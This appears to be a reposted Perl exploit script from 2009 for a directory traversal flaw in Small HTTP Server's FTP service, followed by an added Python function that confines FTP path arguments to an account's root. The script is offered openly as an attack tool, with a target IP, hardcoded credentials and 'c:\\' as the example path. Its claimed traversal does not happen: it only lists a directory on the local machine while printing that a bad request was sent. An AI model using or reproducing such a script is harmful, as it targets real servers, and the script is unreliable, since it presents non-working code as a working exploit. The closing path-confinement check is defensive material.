Small HTTP Server <= 3.05.85 Directory Traversal Exploit
Source: www.vfcocus.net Author: Houssamix Published: 2009-02-03

#!/usr/bin/perl
#
# Author : Houssamix

# Small HTTP Server <= 3.05.85 Directory Traversal Exploit

# Description : Any FTP user with low permissions can access any directory on the server

# Download : http://smallsrv.com/
# [01.01.09] Happy new year! Version 3.05.84

# Greetz to Legend-Spy , Stack , Snakespc , str0ke & ..

use LWP;
use Net::FTP;
use IO::Dir; 
use Tk;

if(@ARGV!=2){
    print "Author : Houssamix \n";
    print "Small HTTP Server <= 3.05.85 Directory Traversal Exploit\n";
    print "Usage: Hsmx.pl IP [dir_path] \n";
    print "Exam: Hsmx.pl 127.0.0.1 c:\\ \n\n";
    exit;
}

$ip = $ARGV[0];
$path = $ARGV[1];

my $username = "houssamix";
my $pass = "123456";
system("color f");

print "\n\n";
print "[+] Author : Houssamix\n";
print "[+] Small HTTP Server <= 3.05.85 Directory Traversal Exploit\n";
print "[+] Connect to $ip ...\n";
sleep(1);
$ftp = Net::FTP->new($ip, Debug => 0, Port => 21) || die "could not connect: $!";

print "[+] Send user and pass..\n";

$ftp->login($username, $pass) || die "could not login: $!";
sleep(1);

print "[+] Logged in\n";
print "[+] Bad request sent \n\n";
sleep(1);

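# Note: IO::Dir reads a directory on the machine running this script;
# the listing below does not go through the $ftp session opened above.
tie %dir, 'IO::Dir', $path;
foreach (keys %dir) {
    print $_, " => ", $dir{$_}->size, "\n";
}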

$ftp->quit; 
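
The description says a low-privilege FTP account can reach any directory on the server, and the usage line passes `c:\` as the target. As an added example (not from the original post and not Small HTTP Server code), this Python function shows the kind of server-side check that keeps an FTP path argument inside the account's root; the root `C:\ftp\guest`, the function names and the sample arguments are assumptions.

```python
import ntpath  # Windows path rules on any host OS


class PathEscape(Exception):
    """Client-supplied path resolves outside the account's FTP root."""


def confine(root, cwd, requested):
    """Map an FTP path argument to a real path under `root`, or raise.

    root      -- real directory the account is confined to (assumed layout)
    cwd       -- session's virtual working directory, starting with "/"
    requested -- raw argument of CWD/LIST/RETR/STOR as sent by the client
    """
    if "\x00" in requested:
        raise PathEscape("NUL byte in path")
    req = requested.replace("/", "\\")
    drive, rest = ntpath.splitdrive(req)
    if drive:
        # "c:\", "c:windows" and "\\host\share\x" name locations outside
        # the virtual tree and must never reach the filesystem API.
        raise PathEscape("drive or UNC prefix: %r" % requested)
    if rest.startswith("\\"):
        virtual = rest                                  # absolute in the jail
    else:
        virtual = cwd.replace("/", "\\") + "\\" + rest  # relative to cwd
    real_root = ntpath.normcase(ntpath.normpath(root))
    # normpath collapses "." and ".." textually before the comparison.
    real = ntpath.normcase(ntpath.normpath(real_root + "\\" + virtual))
    # Compare whole components so ...\guest2 does not pass for ...\guest.
    if real != real_root and not real.startswith(real_root.rstrip("\\") + "\\"):
        raise PathEscape("escapes root: %r" % requested)
    return real  # lower-cased; NTFS lookups are case-insensitive by default


def is_confined(root, cwd, requested):
    try:
        confine(root, cwd, requested)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # Constructed sample arguments; the root path is hypothetical.
    for arg in ["pub/readme.txt", "c:\\", "..\\..\\windows", "/../boot.ini"]:
        print("%-18r %s" % (arg, is_confined("C:\\ftp\\guest", "/", arg)))
```

The check is textual, so a server should also resolve or refuse junctions and symbolic links under the root before opening the file.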


 